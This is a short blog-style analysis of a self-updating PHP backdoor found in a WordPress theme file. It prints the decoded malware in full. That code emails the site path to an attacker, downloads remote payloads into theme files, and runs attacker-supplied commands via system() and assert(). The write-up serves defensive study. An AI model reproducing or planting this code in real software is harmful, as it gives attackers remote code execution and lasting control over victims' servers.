Simple self updating hacktool

While working on a compromised website, it’s very common to encounter hacktools. Those are like the attackers’ swiss knife, allowing them to perform several tasks such as: DoS attacks, execute server level exploits and even simple filemanagers.

Sometime though, we find some very clever ones, such as this one infecting a WordPress website. It was able to download updated malware content from the internet and spread it to a new file.

The original code was hiding inside a Theme file:

wp-content/themes/THEME_NAME/framework/admin/framework-updates.php

The file content was obfuscated, as usual. Here’s a small portion of it:

>>> ${"x47x4cOx42Ax4cx53"}["xx70tx68x62x62ent"]="cx64x78";${"GLOx42x41Lx53"}["x73ex6fx70ch"]="x62x6bx61vx64ox6ee";${"x47x4cx4fx42Ax4cx53"}["x70x65xx6bx78x79"]="x6fx70x65x6e";

Once decoded, the real code can be separated into two sections.

The first part uses a .tmp (“temporary”) file stored into WordPress’ uploads directory and it is used to detect whether this server has been already compromised or not:

<?php
error_reporting(0);
ini_set("display_errors",0);
$string=__FILE__;
if(strtolower(substr(PHP_OS,0,3))=="win")
$os="win";
else
$os="nix";
if($os=="win"){
while((substr($string,-1)!="\"))
$string=substr_replace($string,"",-1);
$filename=$string."..\..x5c..\..x5cuploads\tmp.tmp";
}
else{
while((substr($string,-1)!="/"))
$string=substr_replace($string,"",-1);
$filename=$string."../../../../uploads/tmp.tmp";
}
if(file_exists($filename)){
}
else{
$from_set="sahifa511@".$_SERVER["SERVER_NAME"];
$to="themesrv1@commandandcontrol.infected";
$subject="Accepted";
$header="from: ".$from_set;
$message="Link : http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]."rn";
$message.="Path : ".__file__;
$sentmail=@mail($to,$subject,$message,$header);
if($sentmail==true){
$open=fopen($filename,"w");
}
else{
};
}
?>

The code prepares the file path, adapting accordingly to the server’s OS. Once the file path is ready, it checks for its existence.

If the file already exists, then nothing happens (empty IF block above). Otherwise, the code notifies the attacker via email and writes the file to the disk, which acts as flag for future executions.

The second part the code shows the attack’s potential:

<?
if(isset($_POST["oldmtsfeatures"])){
$file=file_get_contents("http://infected.dom/newfile");
$open=fopen(getcwd()."/wp-mail-sample.php","w");
$yes=fwrite($open,"<?php $file ?>");
if($yes){
echo"<br>done";
}
else
echo"SomethingWentWrong";
if(isset($_POST["elf"])){
$elf=$_POST["elf"];
switch($elf){
CASE 1:{
$file=file_get_contents("http://files.hackingtruth.org/raw/0.txt");
$open=fopen($string."themefile1.php","w");
$yes=fwrite($open,"<?php $file ?>");
echo"1 executed";
break;
}
CASE 2:{
$file=file_get_contents($_POST["addr"]);
$open=fopen($string.$_POST["filewithext"],"w");
$yes=fwrite($open,"$file");
echo"2 executed";
break;
}
CASE 3:{
$cdx=$_POST["cdx"];
$bkavdone='system';
$bkavdone($cdx);
break;
}
CASE 4:{
call_user_func_array("assert", array($_REQUEST["comnd"]));
break;
}
}
}
}
?>

If the attacker posts any content on a “oldmtsfeatures” key, the actual hacktool is executed, and the code is able to spread the infection:

It downloads malware from a remote site and saves it to another file inside the theme’s folder: wp-mail-sample.php

The attacker will use the elf option to select what action the malware will perform.

Options 1 and 2 are yet another spreading tools, which downloads code from another URL, fixed or obtained via POST, and saves it as theme file. Again, the file name could be fixed (themefile1.php) or obtained via POST. Case 2 in particular is very clever, since the malware is able to overwrite itself, with an updated version of the hacktool.

Options 3 and 4 are the most destructive part of the code, since they perform Remote Code Execution. The attacker sends it command to be run via POST, and executes them using a regular system() call or via a more clever execution of PHP’s assert() function.